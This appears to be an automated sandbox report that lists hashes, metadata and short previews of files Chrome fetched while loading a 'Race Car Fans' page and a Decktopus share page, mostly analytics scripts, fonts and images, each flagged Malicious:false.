                                                                                                          SHA-256:5590390CBB4639337DB46D7007E2BE40A0FEE259E8BA27E87B7CE5F6A864FCB9
                                                                                                          SHA-512:41C768731B2475F434E1AD93997BEFDB7FD8C777367674FAAD275B142E0712087759A3FA0A2E8101F3596B0EE7B2B728C1C294F5CB4181A66E7EB7AADC5084DB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Race Car Fans - cyberpulsefe.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.lHKiM2SiXtaqk-cvU0mJVwHaFZ') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;.. text-align:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):79
                                                                                                          Entropy (8bit):2.716326985350135
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                          SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                          SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                          SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):16
                                                                                                          Entropy (8bit):3.875
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                          SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                          SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                          SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkIXaPchs-AixIFDZFhlU4=?alt=proto
                                                                                                          Preview:CgkKBw2RYZVOGgA=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4179)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):272469
                                                                                                          Entropy (8bit):5.542514333018727
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6E6F8FE868F6959C875A7C2DC13A9DCE
                                                                                                          SHA1:26364AC7664098780C6AEB33C485CC076E99666E
                                                                                                          SHA-256:3177971259EAD27BB651D0034E3047DB39F7567C558A7EEB6D82A433F64E835E
                                                                                                          SHA-512:9EF4402CC65F23FBC26C19B556D041217BE8F1A4B3587F09F3FC44DEE068D281D3AD1F75BB9E999F7DD930F6B8CEC8C4C459FDC3C132A5836B5FA6A123B883A3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.googletagmanager.com/gtag/destination?id=AW-10970373263&l=dataLayer&cx=c
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-10970373263","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":4},{"function":"__ccd_ads_first","priority":5,"vtp_instanceDestinationId":"AW-10970373263","tag_id":11},{"function":"__ccd_pre_auto_pii","priority":3,"vtp_instanceDestinationId":"AW-10970373263","tag_id":9},{"function":"__ccd_em_form","priority":2,"vtp_includeParams":false,"vtp_instanceDestinationId":"AW-10970373263","tag_id":8},{"function":"__ccd_add_1p_data","priority":1,"vtp_acceptAutomatic":true,"vtp_acceptCode":true,"vtp_accep
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65460)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):87633
                                                                                                          Entropy (8bit):5.301989368439803
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6E3B65F7F44FA4B3BF86D1F0187490CE
                                                                                                          SHA1:F4006909A11A6DA5A573AF47CB63283A249E80D3
                                                                                                          SHA-256:8AAF0AF04BAF8EAA35B1AC46ED02D131A8D3C44896B92A45FA1555C70EBC94C9
                                                                                                          SHA-512:5730001752C2C6CB8AD9B7AC16804686E8DE26E9A13AB06B22314B6E4C7BF65A4D3C181F44CF0D43ECF1577A15B5B2297252921048C8E8B5860732E2BE8A83AB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:/*! For license information please see nr-spa-1.250.0.min.js.LICENSE.txt */."use strict";(self["webpackChunk:NRBA-1.250.0.PROD"]=self["webpackChunk:NRBA-1.250.0.PROD"]||[]).push([[111],{9139:(e,t,i)=>{let r;i.d(t,{m:()=>s});const n=new Promise((e=>{r=e})),s=Object.freeze({onReplayReady:r,sessionReplayInitialized:n})},1199:(e,t,i)=>{i.d(t,{R:()=>s,z:()=>n});var r=[];function n(e){if(0===r.length)return!0;if(void 0===e.hostname)return!1;for(var t=0;t<r.length;t++){var i=r[t];if("*"===i.hostname)return!1;if(a(i.hostname,e.hostname)&&o(i.pathname,e.pathname))return!1}return!0}function s(e){if(r=[],e&&e.length)for(var t=0;t<e.length;t++){let i=e[t];if(!i)continue;0===i.indexOf("http://")?i=i.substring(7):0===i.indexOf("https://")&&(i=i.substring(8));const n=i.indexOf("/");let s,a;n>0?(s=i.substring(0,n),a=i.substring(n)):(s=i,a="");let[o]=s.split(":");r.push({hostname:o,pathname:a})}}function a(e,t){return!(e.length>t.length)&&t.indexOf(e)===t.length-e.length}function o(e,t){return 0===e.in
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):306
                                                                                                          Entropy (8bit):4.648623844105592
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:82237324D78F728FBF142D3762CBE6D9
                                                                                                          SHA1:BCBE63AB8153323EF2675001FC90501ADB8F50E4
                                                                                                          SHA-256:1F84E4F9371636AA551C5E1AE6292392B03C454848346B3C0BB753555279718D
                                                                                                          SHA-512:875E038B01C92919984ED9B7800E29DE09FFF2A2DB96CC0896FD581B4D227D2302B3A5388A6FB283999549352E3B8E3E67AE03AF6335FFB8BB1EE34FCF8D5FF9
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/manifest.json
                                                                                                          Preview:{. "background_color": "#ffffff",. "display": "standalone",. "icons": [. {. "src": "favicon.ico",. "sizes": "64x64 32x32 24x24 16x16",. "type": "image/x-icon". }. ],. "name": "Create React App Sample",. "short_name": "React App",. "start_url": ".",. "theme_color": "#000000".}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65465)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14839597
                                                                                                          Entropy (8bit):4.952900410064252
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:D3827CECA405C505CC56758183B81C07
                                                                                                          SHA1:92D45708712EF66CB7ADE64BFB44E7E93D9A8811
                                                                                                          SHA-256:359C4ABDA49C8671941E447C2CE020152A4FCAA6E9EC122C40D9FE696AD166F3
                                                                                                          SHA-512:9B63D5FD37812033FF35AC1FCC9DD647860446C83C1314E2BE4EE564385EDB9EBAD57191ADC72361B263229AEA56DC663DF302644AD0BC30132F07352FE0488D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/static/js/main.59117eff.js
                                                                                                          Preview:/*! For license information please see main.59117eff.js.LICENSE.txt */.(()=>{var __webpack_modules__={24247:(e,t,C)=>{"use strict";C.d(t,{A:()=>i});C(15917);const i=C.p+"static/media/logo-full-white.e3aa76d0cb5afa8374ae13fd9c7e586c.svg"},19203:(e,t,C)=>{"use strict";C.d(t,{A:()=>i});C(15917);const i=C.p+"static/media/logo-icon-white.b831e833cc42254b19738eddbcfe2943.svg"},4526:(e,t,C)=>{"use strict";C.d(t,{A:()=>i});C(15917);const i=C.p+"static/media/pdf-import-white.5b71eeb8f60b1d0b9a31bb83608f919a.svg"},3362:(e,t,C)=>{"use strict";C.d(t,{A:()=>i});C(15917);const i=C.p+"static/media/pdf-import.31506d516d7cd2e372955615f827b6e8.svg"},1038:(e,t,C)=>{"use strict";C.d(t,{A:()=>i});C(15917);const i=C.p+"static/media/start-from-scratch.1208e43545fb852d86930f6a4f315e20.svg"},51152:(e,t,C)=>{"use strict";C.d(t,{A:()=>i});C(15917);const i=C.p+"static/media/start-with-a-template.1cce44aa936c944f743c469281064edb.svg"},79095:(e,t,C)=>{"use strict";C.a(e,(async(e,i)=>{try{C.d(t,{A:()=>g});C(15917);v
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13
                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://td.doubleclick.net/td/ga/rul?tid=G-RDRSM8WPZJ&gacid=857128324.1724683725&gtm=45je48l0v893194734z8830215601za200zb830215601&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=287282442
                                                                                                          Preview:<html></html>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (2616), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2629
                                                                                                          Entropy (8bit):5.598150307410542
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:262512B09DF900ED4A3033A7ED0B9955
                                                                                                          SHA1:91B092F44611926C292FEE945419C4E7D55793EA
                                                                                                          SHA-256:F819B85885DA0FB9BEFFA4D99A85D0392872F7A75EA52E09811BC70FEAE844CA
                                                                                                          SHA-512:F26F00BF1D4DA8D1DE10040E9F8328082E81B091EB9B156B97E29F3DF0E2FEB38378815BB0EA664232A83F6BF42EFDF0F8AC09E67A6756A5444BEDCF26B9C8E6
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://trc.taboola.com/1624391/trc/3/json?tim=1724683725042&data=%7B%22id%22%3A100%2C%22ii%22%3A%22%2Fshare%2Fmuykd1%2F1%22%2C%22it%22%3A%22video%22%2C%22sd%22%3Anull%2C%22ui%22%3Anull%2C%22vi%22%3A1724683725033%2C%22cv%22%3A%2220240822-5-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fapp.decktopus.com%2Fshare%2FMUYKd1%2F1%3F%22%2C%22e%22%3Anull%2C%22cb%22%3A%22TFASC.trkCallback%22%2C%22qs%22%3A%22%22%2C%22r%22%3A%5B%7B%22li%22%3A%22rbox-tracking%22%2C%22s%22%3A0%2C%22uim%22%3A%22rbox-tracking%3Apub%3Ddecktopusyazlmanonimirketi-sc%3Aabp%3D0%22%2C%22uip%22%3A%22rbox-tracking%22%2C%22orig_uip%22%3A%22rbox-tracking%22%7D%5D%2C%22mpvd%22%3A%7B%22en%22%3A%22page_view%22%2C%22tim%22%3A1724683725040%2C%22ref%22%3Anull%2C%22item-url%22%3A%22https%3A%2F%2Fapp.decktopus.com%2Fshare%2FMUYKd1%2F1%22%2C%22tos%22%3A0%2C%22ssd%22%3A1%2C%22scd%22%3A0%2C%22it%22%3A%22JS_PIXEL%22%2C%22supv%22%3Atrue%7D%2C%22pa%22%3A%7B%22su%22%3Atrue%7D%2C%22psb%22%3Atrue%7D&pubit=i
                                                                                                          Preview:TFASC.trkCallback({"trc":{"si":"686664027c6af8b111a3e97b55cc5aaf","sd":"v2_686664027c6af8b111a3e97b55cc5aaf_a7da0332-0b6d-4015-b438-7bc53882df9f-tuctdc61b4f_1724683727_1724683727_CNawjgYQx5JjGOnRpPmYMiABKAEw4QE4kaQOQPzYD0iry9kDUOoEWABgAGiQgI6I5eeGxhBwAQ","ui":"a7da0332-0b6d-4015-b438-7bc53882df9f-tuctdc61b4f","plc":"DESK","wi":"8865116369869638730","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1624391","cpb":"EhIyMDI0MDgyMi01LVJFTEVBU0UYASCc__________8BKhljaC50YWJvb2xhc3luZGljYXRpb24uY29tMg90cmMtdHJhY2tpbmc4MDI4gPa5QUCRpA5I_NgPUKvL2QNY6gRjCNNXEMdzGDBkYwiNWhC5dhgyZGMI3f__________ARDd__________8BGCNkYwjSAxDgBhgIZGMIlhQQnhwYGGRjCKocEItfGAlkYwi7ShCkYhgLZGMInmgQn4cBGD1kYwjC__________8BEML__________wEYPmRjCPQUEJ4dGB9kYwikJxCKNRgvZHgBgAHiI4gBy5mQ0gGQARiYAYXkpPmYMtsBEAHcAQ","evh":"562746651","evi":{"48":"11219|14791","50":"11533|15161","61":"13342|17311","62":"-62|-62","47":"5028|6794"},"vl":[{"ri":"0320abee465
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (34229)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):364674
                                                                                                          Entropy (8bit):5.554003797402745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:5E5843BDB8BB754E690CC06E0847BA30
                                                                                                          SHA1:4EB74034563644A5792B464E1D538458C3723285
                                                                                                          SHA-256:5082438FE6935F0CC33725FB043026966CEE00D25EB04954AA0ADE74EEA785FA
                                                                                                          SHA-512:190A6B06466AC7F35DE9F692B46140EA140A25A47BB3308A708FF8081C740736029AD3B563BE5498AF25F33DC170AADCFA641ABD74A787B1B3076BB380BC28EE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"119",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 312 x 82, 8-bit/color RGB, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9669
                                                                                                          Entropy (8bit):7.957231488488939
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:9B0BCA61C650B8D443137F7F3DFF445B
                                                                                                          SHA1:28A6F4BBF4099C06C1256551A14F8A423359E0B2
                                                                                                          SHA-256:7044F2CA6FC8E4C12BA3322F85B387E46F7AB9398BE5E9FB7615C5AB49BEC760
                                                                                                          SHA-512:A1B8A92D441D3641E13C1F82549DF6A66DAACB60B17FC55990A8AFE48FF45B96741FD2CEB7CB88D113AD5B36A716E572D7C5B500194B7DD6E15CC41B15EF4FD4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR...8...R.....O._... .IDATx..{XSG........!.KLD....@./.WP.U.-Zl-.'.V...v.jw.>..e.......i.*.....Q.H.. B........1z<.9.'.n...<yx.s...s.yg.yg...d...... ...Kj444xF.WB....~[=\.............+5...<.Q.z.PJ.>.e..f...A...Cxp.\1,.......A........%A...<. ..:57...qKG.4.....#. .'....{..q.i......A=]R...1.=Y......j..=Z#.x.........3TA=...b.?/...ihh.....C5fF....Sx..PR....3$A.w....G...........Wk[..oQ.J..f....ZP..Z.......TY]..u...*..p1HA..d%.h....uihh.0.A.+.GqE[KG...........1.>%......Q...\hhh.X-...).......e..BCC..:A.+.7......c.Zk......BP.ujv~}}p...Io.@C3h....Y....{./6.......o.......!.]...../.%....,......Yt:8..R.....9...8.....m..B....W.../..;;;.+;.._....N.[...7.2/..*.J.....y<...HC.....p..n).../..U..j...d.47yyy.W...moo?\.....JeZ.6.......7.x.?Y..L..u....+.ia....J$...[...;.....d...K.......a.L...ti..m=../.8...*R.N'..7n.k..N_.T^.|.........I........|.P(.5k.............>....mU(.....GGGk...t"Q l....9r......-v.{w.K/.P.....~i...}y7........mtz......scL.d.|8.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):69
                                                                                                          Entropy (8bit):4.215030923737321
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:1E07B1F0561718948A8C5D4E27BF35FE
                                                                                                          SHA1:BE52BE187FD676107EE0109A67FB5E71F3CB8865
                                                                                                          SHA-256:86445D043D040DD3C7DE24A05603172D85196DD7991F0F5EB7104C7CA1FB6710
                                                                                                          SHA-512:D0FA84AF9A4E68F8B8E5B6EBCFA1E1B9FC8D500611F1E7B595B13D705A27C7B2CA5F2E4D20ACD797E00F63975267DEBB75890830DDC1FD45E37F5F0AABCFFB50
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:failed to parse request: EOF while parsing a value at line 1 column 0
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 21296, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):21296
                                                                                                          Entropy (8bit):7.988825547958458
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:076AE226E8FF62238517B79CF636F797
                                                                                                          SHA1:7C9D17368F02852D90B7E15E274CFE0F96E0C14D
                                                                                                          SHA-256:9A541A82688D8353559A720BF10CF3777E3B520E3C52B41874C7BBB2ACAD3306
                                                                                                          SHA-512:F33749D886121AF80C2F48F3B9BC9CB77E5D0EBCD4B7739347E0BEC4F5C106A13EA1910624DBECA92E89B2305F17B706044593212763F24950CFAF663CEE28AC
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/static/media/Sailec-Regular.307c4fb7f8da8e0a7fa0.woff2
                                                                                                          Preview:wOF2......S0..........R.........................?FFTM..B..4....`..&.....D.._..l..6.$..T. ...........6..y...FM[w.ql...R...,`......~.-.....1j.'.4....)........6.t...P.f\...(.i..'s.@..1...;......V../..D..=|....$Q...^3.$... ...*.#..g.k4J#...N...b.x....=...?.W2.U0N.qU.Au..,.....U.V].<...}U=3...Q%.......D.(..U.aV.k..u7.Y..0...*.B...._|G..~G.....i.....'.gx.[..(.Pw!.V.......K..a....Q.Y.2....O.H...pz.;...u.4%..-..Z.x.l....0...dnE..q......p/...LK..j4."...m.Ng......C.../6..Z.*.>R;^..y!.0..X.O\Z.^........0M.S.......FN..ojN[.....s...0..~..|...........,....a.v.m......v>....E..B.(N..Z7.M]..9..Z....?C..s.L8..8..B.]......[[...U,..|.k.../.......cI.T..O#....v.Q.T...n....2,.H.8.!P..%0....q..O.%..G..p...I*.T9.J.r.BVL.k..]t!..i]..:......9:....qt......D..-..a......U..fH..4.W...T.......+m.!.:&..zZ#k4+.BN.S....z...g.M5.v.M.....J..c.....JC.!.....0;_....H<......*uv...[....7..7...k!....A..<..\.*....3......:....j`.g.r.gu.gE.f..."....n.p....8..H.....6...[........ ....(X...F....`
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3567), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3567
                                                                                                          Entropy (8bit):5.32203621037149
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C52AA1EA682AEF8AD5EBF7AFF9662E35
                                                                                                          SHA1:E171DA979A8C5DFB1DEF6A4ED2F4C72BB787CD18
                                                                                                          SHA-256:BCE4B47B8FC12DE49FAC0A00E9039E38AA568ABA0EE9154B93D20465F0289CFA
                                                                                                          SHA-512:BD010B3C92B9737B31F70E3EF108B11093075EFA80CC096B6BB3E9591DAD6E5420B50D6E949F9D2DAFBB420514906667282ED155F8E355A5738D965ED3226D34
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:!function(t){try{var e="https://",n="aHR0cHM6Ly9waXBzLnRhYm9vbGEuY29t",r=["YXJjaGl0ZWN0dXJl","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="],a=["YnJhbmRz","bW9iaWxl","bW9kZWw=","cGxhdGZvcm0=","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="];t.TRC.cdsPips={userId:null,getHttpsPrefix:function t(){return e},doNothing:function t(){return!0},safeGetTfaConfig:function e(n,r,a){return t._tfa&&t._tfa.config&&t._tfa.config.safeGet&&t._tfa.config.safeGet(n,r,a)},safeGetRboxConfig:function t(e){var n;return(TRCImpl?TRCImpl.global:{})[e]},prepareGenericRequest:function e(n,r){var a,s=new(t.XDomainRequest||t.XMLHttpRequest);return s.open(n,r),s.onload=this.doNothing,s.onerror=this.doNothing,s.onprogress=this.doNothing,s},tryToReadUserIdFromLocalStorage:function t(){try{return window.localStorage["taboola global:user-id"]}catch(t){return null}},getUserId:function e(){var n=t.TFASC&&t.TFASC.tfaUserId&&"function"==typeof t.TFASC.tfaUserId.getUserId?t.TFASC.tfaUserId.getUserId():null,r=t.TRC.pageManager&&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):65
                                                                                                          Entropy (8bit):4.0299097360388085
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2489B6BEDA4E86203D22D9C4D2E67094
                                                                                                          SHA1:590C361A0E91BB56D08DDEC98BF49A02E017D191
                                                                                                          SHA-256:E7112B70EED95D42B178135728E6153E34F07001827870748DE87CD7DEC3538E
                                                                                                          SHA-512:2DB08EB201F83DD7C2B7293A1E8375C0FE06B1787E21EC0D2F6EF3BC9D5355CCC06208B79FF2457C0175B30A1643AE3B624684E4E834AFDEEA727D7E61A0FB3C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://psb.taboola.com/topics_api
                                                                                                          Preview:<HTML><HEAD> <TITLE>200 OK</TITLE></HEAD><BODY>.OK.</BODY></HTML>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 70 x 77, 8-bit/color RGB, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):4.068159130770306
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4D7BDACA8D957F17E6CF1E4512CBC9DA
                                                                                                          SHA1:A98C09A6BC12BDA93439966E09C4C531398C2B54
                                                                                                          SHA-256:2FAB0B3DFAEF6A9C39A08AC285F8CD170D7F8CD53ECD9400447D6EDC2C5DB495
                                                                                                          SHA-512:1C77B8F947CA9C0BF2EB27372921883ECA5BCBC302A4E8BBE041C67CC4A7A6902FB8BA620A2C9F4A408B81C7BE2B073A89DE8DAF44A35557EC040311EC702C81
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b949fe2ea2743cd/1724683726948/Yr-CKQeFW1oWUS6
                                                                                                          Preview:.PNG........IHDR...F...M.............IDAT.....$.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65509)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):72567
                                                                                                          Entropy (8bit):5.389398937744739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4A948E346DE6C4E587C7A1DD8F3B17B4
                                                                                                          SHA1:62F7AECAB463881EE33077271DC1C6EC1988E91C
                                                                                                          SHA-256:F7EE01955200B200177E8390F70BA348ECA9DCEEF994BE390F5E16CE40C4B645
                                                                                                          SHA-512:F400A806B8BBDA24163CDEFA80CBEAA0C469D06F2AFB39D6AABA47B7A91E3D022F7F78E2BDB3B2E6A51FBCC645F0B3ECB1808290DEF58382396B33B371064661
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://cdn.taboola.com/libtrc/unip/1624391/tfa.js
                                                                                                          Preview:/*! 20240822-5-RELEASE */..function _typeof(e){"@babel/helpers - typeof";return(_typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}!function(e){var t='TFASC';t.indexOf("{jsScope}")>-1&&(t="TRC"),e[t]||(e[t]={})}(window),function(e,t){e.TRC=e.TRC||{};var n=function e(){return!0},r=function n(r,i,o,a){var s=r+"/"+encodeURIComponent(o||e.TRC.publisherId)+"/log/3"+"/"+i;return a&&(s+="?"+t.TRCLogger.formatParams(a)),s},i=function t(r,i,a,s){var c,u=new(e.XDomainRequest||e.XMLHttpRequest);return u.open(r,i),u.onload="function"==typeof s?s:n,u.onerror=n,u.ontimeout=n,u.onprogress=n,u.withCredentials=!0,a&&o(u,a),u},o=function e(t,n){for(var r in n)n.hasOwnProperty(r)&&t.setRequestHeader(r,n[r])};e.TRC.TRCLogger=t.TRCLogger={post:function n(o,a,s,c,u,l){var f=r(o,a,c,u),d=i("POST",f);l&&"function"==typeof e.navigator.sendBeacon?e.na
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 45300, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):45300
                                                                                                          Entropy (8bit):7.99526293185803
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:5FE660C3A23B871807B0E1D3EE973D23
                                                                                                          SHA1:62A9DD423B30B6EE3AB3DD40D573545D579AF10A
                                                                                                          SHA-256:E13FFA988BE59CBF299D7FF68F019F902B60848203AC4990819EB7E4624EE52D
                                                                                                          SHA-512:9EB08055BEFC2B70CC8BBA34496F14414EA32F5B97F185D357F100EA7D74BFDC12AFD815A53E629D02A53DC7F3E37096DF8BBBD36AB44A011C1A4288B42780CD
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://fonts.gstatic.com/s/ptsans/v17/jizaRExUiTo99u79D0KExQ.woff2
